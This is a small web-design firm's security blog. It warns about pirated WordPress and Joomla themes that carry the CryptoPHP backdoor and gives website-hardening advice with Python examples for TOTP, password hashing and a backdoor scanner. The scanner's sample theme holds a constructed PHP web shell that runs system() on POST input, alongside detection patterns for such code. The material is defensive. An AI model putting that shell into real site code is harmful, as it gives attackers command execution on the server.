Web Site Design Blog

Blog Category: Security
January 28, 2015

Be careful where you download themes and plugins for WordPress, Joomla, Drupal or other popular CMSs. They are often insecure, out of date or poorly written, and some carry deliberately planted backdoor scripts, as the article quoted below describes. Install extensions only from the project's official directory or directly from the vendor, and keep them updated.

It’s best to work with a professional who understands security and keeps up to date with the latest information in the constantly evolving field of website and IT security.

Contact us for a free, no hassle evaluation of your website that includes a basic security analysis.

Unlike most website backdoors, CryptoPHP is not installed by exploiting vulnerabilities. Instead attackers distribute pirated versions of commercial plug-ins and themes for Joomla, WordPress and Drupal through several sites and wait for webmasters to download and install them on their own websites. Those pirated plug-ins and themes have the CryptoPHP backdoor embedded into them.

Read More at PC World »
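
As an added example (not code from the original post or from the PC World article), here is a small Python triage scanner that flags the generic idioms backdoored PHP themes and plugins tend to rely on: eval() of a decoded payload, the old preg_replace /e modifier, request input fed straight to a shell function or to a variable function call, and very long base64 literals. The patterns and the two sample theme files are constructed for illustration; they are heuristics for deciding what to read by hand, not a signature for CryptoPHP or any other specific family, and a clean result does not prove a download is safe.

```python
import base64
import re

# Generic idioms of obfuscated or backdoor-style PHP. These are triage heuristics
# (assumptions of this example), not a signature for any particular malware family.
SUSPICIOUS_PATTERNS = {
    "eval-of-decoded-payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
        re.IGNORECASE),
    # preg_replace with the (removed in PHP 7) /e modifier executes the replacement as code;
    # this rule assumes the common "/" delimiter
    "preg_replace-e-modifier": re.compile(
        r"\bpreg_replace\s*\(\s*['\"]/.*?/[a-zA-Z]*e[a-zA-Z]*['\"]"),
    # a variable holding a function name, called directly on request input
    "dynamic-call-on-request-input": re.compile(
        r"\$[A-Za-z_]\w*\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "shell-on-request-input": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    # long base64 string literals are where obfuscated payloads usually hide
    "large-base64-literal": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}


def scan_php_source(source):
    """Return a list of (rule, line_number) hits for one PHP file's contents."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                hits.append((rule, lineno))
    return hits


def scan_tree(files):
    """files: {relative_path: source}. Returns {path: hits} for files with hits only."""
    report = {}
    for path, source in sorted(files.items()):
        hits = scan_php_source(source)
        if hits:
            report[path] = hits
    return report


# Constructed sample theme: one ordinary file and one carrying a planted backdoor.
_PAYLOAD = base64.b64encode(b"if(isset($_POST['c'])){system($_POST['c']);}").decode()
_BLOB = base64.b64encode(b"\x00" * 180).decode()  # 240 characters of opaque data

SAMPLE_THEME = {
    "functions.php": (
        "<?php\n"
        "function mytheme_setup() {\n"
        "    add_theme_support('post-thumbnails');\n"
        "}\n"
        "add_action('after_setup_theme', 'mytheme_setup');\n"
    ),
    "inc/social-share.php": (
        "<?php\n"
        "function social_share_init() { return true; }\n"
        "eval(base64_decode('" + _PAYLOAD + "'));\n"
        "$fn = 'sys' . 'tem';\n"
        "$fn($_POST['cmd']);\n"
        "$data = '" + _BLOB + "';\n"
    ),
}

if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_THEME).items():
        for rule, lineno in hits:
            print(f"{path}:{lineno}: {rule}")
```

Run it over a freshly downloaded theme before activating it; every hit is a line to open and read, and a file with no hits still deserves a look if it came from an unofficial source.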

August 11, 2014

It’s a vicious cycle. The web continues to rapidly evolve and grow and developers and programmers are caught in a constant cycle of playing catch up.

The recent news of over a billion stolen passwords and Google's announcement that it will start factoring TLS/HTTPS encryption into its search ranking are just two of many recent signs that we need to pay serious attention to security on the web. This post provides an overview of some steps you should be taking today to secure your website and protect your users' data.

Encrypt the Connection Using HTTPS

If you aren't transmitting data over HTTPS, your visitors are not protected from attackers who monitor their traffic on the network or steal their credentials and session cookies. Check your website using this tool and see whether you have any issues with your encrypted connection. If you do not have a certificate for HTTPS and need one installed, I can help.

Here is a simple PHP script that redirects visitors to the current page over HTTPS, followed by the equivalent Apache rewrite rule. Both build the target URL from the Host header the browser sent, so make sure your server only answers for hostnames you control; otherwise a forged Host header turns the redirect into an open redirect. Once everything is served over HTTPS, a Strict-Transport-Security header tells returning browsers to skip the plain-HTTP request entirely.


// with PHP (run this before any output is sent)
// some servers set HTTPS to "off" rather than leaving it unset, so check both
if (empty($_SERVER['HTTPS']) || $_SERVER['HTTPS'] === 'off') {
    // REQUEST_URI keeps the path and query string; SCRIPT_NAME would drop the query
    $sslurl = 'https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    header('Location: ' . $sslurl, true, 301);
    exit; // stop here, otherwise the rest of the page is still served over plain HTTP
}

# or with .htaccess on an Apache server (mod_rewrite must be enabled)
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

Prevent Brute Force Attacks

One of the easiest ways to break into a website is to attack its login page with a dictionary or brute force attack: trying thousands of common passwords until one works. You can blunt these attacks by limiting failed login attempts per account and per IP address, and by placing additional defensive measures on your login page, including:

  • A CAPTCHA challenge / response field.
  • An additional layer of authentication in front of the login page using .htaccess (HTTP basic authentication).
  • My personal favorite is implementing Google 2 Step Verification, which uses the same time-based one-time password (TOTP) scheme as the Google Authenticator app. This method checks a random-looking, time-sensitive code generated by a smartphone app in addition to the password. This functionality can be implemented in your own custom web application. It is far more secure than a password alone, since it authenticates based on something you know (your username and password) and something you possess (your smartphone).
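
The time-based codes described in the last bullet are the TOTP scheme of RFC 6238, which is what Google Authenticator implements. The following is an added worked example in Python, not code from this post, showing the code generation, a verification step that tolerates one step of clock drift while refusing replay of an already-used code, and a per-account attempt limiter, since a six-digit code can be brute-forced too if the login page lets an attacker try a million times. The test secret and constants are the ones from the RFC; the LoginThrottle class and its defaults are this example's own choices.

```python
import base64
import hashlib
import hmac
import struct
import time

TIME_STEP = 30   # seconds per code, the interval Google Authenticator uses
DIGITS = 6


def secret_from_base32(text):
    """Decode the shared secret as apps display it (Base32, case-insensitive, spaces allowed)."""
    return base64.b32decode(text.replace(" ", "").upper())


def hotp(secret, counter, digits=DIGITS):
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    number = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(number % (10 ** digits)).zfill(digits)


def totp(secret, at_time, digits=DIGITS, step=TIME_STEP):
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time."""
    return hotp(secret, int(at_time) // step, digits)


def verify_totp(secret, code, at_time, window=1, last_counter=None):
    """Accept the code for the current time step or up to `window` steps either side
    (clock drift between phone and server). Returns the matching counter, which the
    caller should persist and pass back as last_counter so a captured code cannot be
    replayed within its validity window; returns None on failure."""
    current = int(at_time) // TIME_STEP
    for counter in range(current - window, current + window + 1):
        if last_counter is not None and counter <= last_counter:
            continue  # this step, or an older one, was already used
        if hmac.compare_digest(hotp(secret, counter), str(code)):
            return counter
    return None


class LoginThrottle:
    """Per-account failed-attempt counter (this example's own design). A 6-digit code
    has only a million values, so the second factor needs attempt limiting too."""

    def __init__(self, max_failures=5, lockout_seconds=900):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self._failures = {}  # username -> (count, time of first failure in window)

    def allowed(self, username, now):
        count, first = self._failures.get(username, (0, now))
        if now - first > self.lockout_seconds:
            self._failures.pop(username, None)  # window expired
            return True
        return count < self.max_failures

    def record(self, username, success, now):
        if success:
            self._failures.pop(username, None)
            return
        count, first = self._failures.get(username, (0, now))
        if now - first > self.lockout_seconds:
            count, first = 0, now
        self._failures[username] = (count + 1, first)


if __name__ == "__main__":
    secret = secret_from_base32("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ")  # RFC 6238 test secret
    print("current code:", totp(secret, time.time()))
```

The server's clock must be accurate (run NTP) or the drift window will swallow every valid code; and store last_counter per user, since accepting the same code twice within its window is exactly what a phishing proxy relies on.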

Hash Passwords

Most websites hash passwords today, but I suspect many aren't doing it correctly, and I shudder to think how many still store passwords in plaintext. Passwords should never be stored in a reversible form, not even encrypted; keep only a hash of each one. A plain MD5 (or SHA-1) hash is easily cracked: these functions are fast and unsalted, so an attacker can precompute lookup tables or test billions of guesses per second on a GPU. Each password needs its own unique random salt and a deliberately slow algorithm designed for the job, such as bcrypt, scrypt or PBKDF2 (in PHP, password_hash() and password_verify() handle this for you). More information on creating cryptographically secure password hashes.
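
An added example, in Python rather than the PHP used above (PHP's password_hash() and password_verify() do the same job), showing the difference: an unsalted MD5 lookup cracks a common password instantly, while PBKDF2-HMAC-SHA256 with a random 16-byte salt per password gives two users with the same password different hashes, is compared in constant time, and stores its parameters alongside the hash so the iteration count can be raised later. The storage format, the iteration count and the tiny lookup table are this example's choices, not the post's.

```python
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000   # tune so one hash takes ~100 ms on your server; raise it over time


def unsalted_md5(password):
    """What NOT to do: identical passwords give identical hashes, so one
    precomputed table cracks every account that uses a common password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


# A tiny stand-in for an attacker's precomputed table of common passwords (constructed).
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein"]
MD5_TABLE = {unsalted_md5(p): p for p in COMMON_PASSWORDS}


def crack_md5(digest):
    """Instant lookup, no computation needed at attack time."""
    return MD5_TABLE.get(digest)


def hash_password(password, iterations=ITERATIONS):
    """Return a self-describing string: algorithm$iterations$salt$hash. Storing the
    parameters with the hash lets you change them without breaking old entries."""
    salt = os.urandom(16)   # fresh random salt per password, never reused
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([ALGORITHM, str(iterations), salt.hex(), digest.hex()])


def verify_password(password, stored):
    """Recompute with the stored salt and iterations, then compare in constant time
    so response timing does not leak how many bytes of the hash matched."""
    algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    if algorithm != ALGORITHM:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def needs_rehash(stored, iterations=ITERATIONS):
    """True if the entry was made with weaker parameters than the current policy;
    check this after a successful login and re-hash the password you just verified."""
    algorithm, stored_iterations, _, _ = stored.split("$")
    return algorithm != ALGORITHM or int(stored_iterations) < iterations


if __name__ == "__main__":
    print("md5 of 'letmein' cracks to:", crack_md5(unsalted_md5("letmein")))
    a = hash_password("letmein")
    b = hash_password("letmein")
    print("same password, different stored values:", a != b)
    print("verify correct:", verify_password("letmein", a))
    print("verify wrong:  ", verify_password("letmeout", a))
```

The salt does not need to be secret, only unique; what makes this resist cracking is the cost of every guess. Keep the iteration count on a schedule and let needs_rehash() migrate users forward on their next login.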

Sanitize User Input

Never trust anything a user submits: form fields, URL parameters, cookies and uploaded files can all carry an attack. Validate input against what you expect (an allowlist of characters, a length, a format) before using it in a script, and then handle it according to where it goes next: use parameterized (prepared) queries when inserting into a database, so user data can never be interpreted as SQL, and escape data for the context it is displayed in (HTML body, attribute, JavaScript, URL) to prevent cross-site scripting. Stripping "bad" characters on the way in is not enough on its own, because the dangerous characters differ by context; modern languages and frameworks provide encoding and prepared-statement APIs for exactly this.

Summary

I hope this brief summary of security practices gives you some direction when reviewing your own practices and securing your website. Please feel free to contact me if you need assistance implementing any of these measures. I would be happy to look at your site and give you a security evaluation.

August 9, 2014

WordPress announced security release 3.9.2 last Wednesday. If you are running WordPress, log into your dashboard and make sure you are running the latest version (3.9.2 at the time of this writing).

If you are a client of mine and running a WordPress site or blog, I have already updated your WordPress version to 3.9.2 as a courtesy. You may want to check anyway just to be sure, as it is possible I overlooked your site in my list, or simply send me an email and I will confirm.

Interestingly this is the first time WordPress and Drupal have coordinated joint security releases. It is nice to see two top open source CMSs coordinating efforts.

This vulnerability also affects the following Drupal versions:

  • Drupal core 7.x versions prior to 7.31.
  • Drupal core 6.x versions prior to 6.33.

Feel free to contact me if you need assistance updating a WordPress or Drupal installation.

Edit: This vulnerability only affects self-hosted WordPress websites using code downloaded from WordPress.org. Websites hosted at WordPress.com are not affected.